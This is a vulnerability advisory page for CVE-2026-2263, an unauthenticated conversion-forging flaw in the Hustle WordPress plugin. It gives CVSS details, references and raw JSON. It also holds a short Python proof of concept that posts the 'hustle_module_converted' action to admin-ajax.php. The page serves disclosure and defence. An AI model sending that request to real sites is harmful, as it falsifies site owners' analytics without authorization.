Security Vulnerability Report
CVE-2026-2263 CVSS 5.3 MEDIUM


Published: 2026-04-08 00:16:05
Last Modified: 2026-04-27 19:04:23

Description

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)


The Hustle Plugin <= 7.8.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Payload to exploit the missing capability check
payload = {
    "action": "hustle_module_converted",
    "module_id": "1",  # Replace with a valid or guessed module ID
    "page_id": "1",    # Optional, depending on plugin configuration
}

try:
    # Sending unauthenticated POST request
    response = requests.post(target_url, data=payload)

    # Check if request was successful (HTTP 200 usually implies processing in this context)
    if response.status_code == 200:
        print("[+] Exploit successful! Conversion event likely forged.")
    else:
        print("[-] Request failed with status code:", response.status_code)
        print("Response:", response.text)
except Exception as e:
    print("[!] An error occurred:", e)

References

https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047
https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32
https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311
https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11
https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2263",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T00:16:04.980",
    "lastModified": "2026-04-27T19:04:22.650",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve", "source": "[email protected]"}
    ]
  }
}